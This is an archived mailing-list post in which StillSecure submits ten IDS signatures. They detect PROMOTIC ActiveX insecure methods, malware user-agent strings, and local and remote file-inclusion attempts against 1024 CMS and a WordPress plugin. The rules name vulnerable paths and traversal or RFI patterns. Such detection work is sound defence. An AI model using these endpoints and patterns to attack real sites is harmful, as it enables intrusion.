[Emerging-Sigs] StillSecure: 10 New Signatures - October 21st, 2011

signatures signatures at stillsecure.com
Fri Oct 21 08:34:27 EDT 2011


Hi Matt,

Please find the 10 signatures below,

1. WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (SaveCfg)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (SaveCfg)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"02000002-9DFA-4B37-ABE9-1929F4BCDEA2"; nocase; distance:0; content:".SaveCfg"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*02000002-9DFA-4B37-ABE9-1929F4BCDEA2/si"; classtype:attempted-user; reference:url,aluigi.altervista.org/adv/promotic_1-adv.txt; sid:1710111; rev:1;)

2. WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (AddTrend)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (AddTrend)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"02000002-9DFA-4B37-ABE9-1929F4BCDEA2"; nocase; distance:0; content:".AddTrend"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*02000002-9DFA-4B37-ABE9-1929F4BCDEA2/si"; classtype:attempted-user; reference:url,aluigi.altervista.org/adv/promotic_1-adv.txt; sid:1710112; rev:1;)

3. VIRUS Suspicious user agent string (FULLSTUFF)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"VIRUS Suspicious user agent string (FULLSTUFF)"; flow: established,to_server; content:"|0d 0a|User-Agent|3A| FULLSTUFF"; nocase; depth:300; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=mrb.mail.ru; sid:2011480; rev:1;)

4. VIRUS Suspicious user agent contains string (MSIE 6.0)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS Suspicious user agent contains string (MSIE 6.0)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| Mozilla/4.0 (compatible|3b| MSIE 6.0|3b|"; classtype:trojan-activity; sid:1810113; rev:1;)

5. USER_AGENT Suspicious user agent string (NateFinder)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (NateFinder)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| NateFinder"; classtype:trojan-activity; sid:1810111; rev:1;)

6. USER_AGENT Suspicious user agent string (Install Stub)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (Install Stub)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| Install Stub"; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=stats.norton.com; sid:1910111; rev:1;)

7. USER_AGENT Suspicious user agent string (webfile)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (webfile)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| webfile"; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=upsh.playmusic.co.kr; sid:1910112; rev:1;)

8. USER_AGENT Suspicious user agent string (DARecover)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (DARecover)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| DARecover"; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=clients.mydealassistant.com; sid:2010111; rev:1;)

9. WEB-PHP 1024 CMS filename Parameter Local File Inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP 1024 CMS filename Parameter Local File Inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/modules/forcedownload/force_download.php?"; nocase; uricontent:"filename="; content:"|2e 2e 2f|"; nocase; depth:200; classtype:web-application-attack; reference:url,exploit-db.com/exploits/18000; sid:2010112; rev:1;)

10. WEB-PHP Wordpress disclosure policy plugin Remote File Inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Wordpress disclosure policy plugin Remote File Inclusion Attempt"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/wp-content/plugins/disclosure-policy-plugin/functions/action.php?"; nocase; pcre:"/abspath=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,exploit-db.com/exploits/17865; sid:1021111; rev:1;)

Looking forward your comments if any.

Thanks & Regards,
StillSecure

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20111021/80be194d/attachment.html


More information about the Emerging-sigs mailing list